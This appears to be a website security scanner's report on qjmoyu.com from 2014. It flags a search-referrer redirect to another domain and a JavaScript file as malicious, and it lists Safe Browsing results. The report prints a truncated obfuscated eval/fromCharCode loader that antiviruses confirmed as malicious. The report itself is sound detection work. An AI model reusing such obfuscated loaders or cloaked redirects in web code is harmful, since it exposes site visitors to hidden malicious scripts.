Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.qjmoyu.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.qjmoyu.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Object moved Cache-Control: private Date: Sat, 16 Aug 2014 19:08:51 GMT Location: http://www.134099.com/#?www.qjmoyu.com Server: Microsoft-IIS/7.5 Content-Length: 136 Content-Type: text/html Set-Cookie: ASPSESSIONIDAQCRDTQT=DPMBNNMDEBENKFFEBFJEMAEH; path=/ X-Powered-By: ASP.NET | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.qjmoyu.com/ | 200 OK Content-Length: 44645 Content-Type: text/html | clean |
http://js.users.51.la/17235439.js | 200 OK Content-Length: 1964 Content-Type: application/x-javascript | clean |
http://js.users.51.la/17235439.js.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://js.users.51.la/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://bb.5599bb.com/js/q2.gif | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.qjmoyu.com/Inc/Southidcmenu.js | 200 OK Content-Length: 44499 Content-Type: application/x-javascript | clean |
http://www.qjmoyu.com/picnews.js | 200 OK Content-Length: 170 Content-Type: application/x-javascript | clean |
http://www.qjmoyu.com/imgs/su_focusflash.js | 200 OK Content-Length: 17084 Content-Type: application/x-javascript | clean |
http://s16.cnzz.com/stat.php?id=2337945&web_id=2337945 | 200 OK Content-Length: 9322 Content-Type: application/javascript | clean |
http://www.qjmoyu.com/ps/ps.js | 404 Not Found Content-Length: 1163 Content-Type: text/html | clean |
http://www.qjmoyu.com/js/cs.js | 200 OK Content-Length: 10485 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) OlOlll="(x)";OllOlO=" String";OlllOO="tion";OlOllO="Code(x)}";OllOOO="Char";OlllOl="func";OllllO=" l = ";OllOOl=".from";OllOll="{return";Olllll="var";eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+ Antivirus reports:
|
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=qjmoyu.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://qjmoyu.com/
Result: qjmoyu.com is not infected or malware details are not published yet.
Result: qjmoyu.com is not infected or malware details are not published yet.